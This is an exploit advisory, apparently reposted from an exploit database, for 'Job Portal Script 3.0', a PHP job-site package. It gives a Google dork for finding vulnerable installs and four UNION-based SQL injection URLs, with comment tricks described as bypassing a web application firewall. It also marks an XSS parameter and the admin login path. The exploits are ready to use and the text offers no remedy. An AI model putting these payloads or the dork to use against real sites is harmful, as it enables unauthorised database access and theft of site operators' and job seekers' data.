###########################

# Job Portal Script 3.0 Cross Site Scripting And SQL Injection Vulnerability

###########################

################################################
#Title: Job portal Script v3.0 - SQL Injection / Cross Site Scripting
#Credit: Bilal KARDADOU
#Vendor: www.jobportalscript.com
#Vendor URL: http://www.jobportalscript.com/index.html
#Product: Job portal site.
#Google Dork: categorysearch.php?indus=
#                    placementpaper.php?pn= ...
################################################
#
#    Product & Service Introduction:
#      Job site script is an advanced PHP job script to run your Job portal
site.
#   It is a complete script with advance features.#
#
#
#
# --SQL Injection/Exploit--
#
#
localhost/categorysearch.php?indus=A'+/*!50000UNION*/+/*!50000SELECT*/+1,version(),3,4,5,6--
-
#   localhost/placementpaper.php?pn=11'
/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,version(),6,7,8,9,10,11,12,13-- -
#
localhost/placement_new.php?type=-2%27%20/*!50000UNION*/+/*!50000SELECT*/+1,version(),3,4,5,6,7,8--%20-
#   localhost/training_question.php?cate_id=-3
/*!50000UNION*/+/*!50000SELECT*/+1,2,3,version(),5,6,7-- -
#
#         Bypassing WAF with Special Characters...
# ---PoC---
#   http://prnt.sc/ehag7j
#   http://prnt.sc/ehagg6
#   http://prnt.sc/ehagsv
#   http://prnt.sc/ehah1p
#
# --(XSS)Cross Site Scripting--
#   localhost/categorysearch.php?indus=A[XSS]
#   http://prnt.sc/ehaj87
#
# --Panel--
#
#   admin/login.php
# Bilal KARDADOU - https://www.linkedin.com/in/bilal-kardadou-21a000127)
################################################

-- 
*Bilal Kardadou*
IT Security Consultant
*E* : b.kardadou@capvalue.ma | *E* : bilalkardadou@gmail.com |

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2017-03-10]

###########################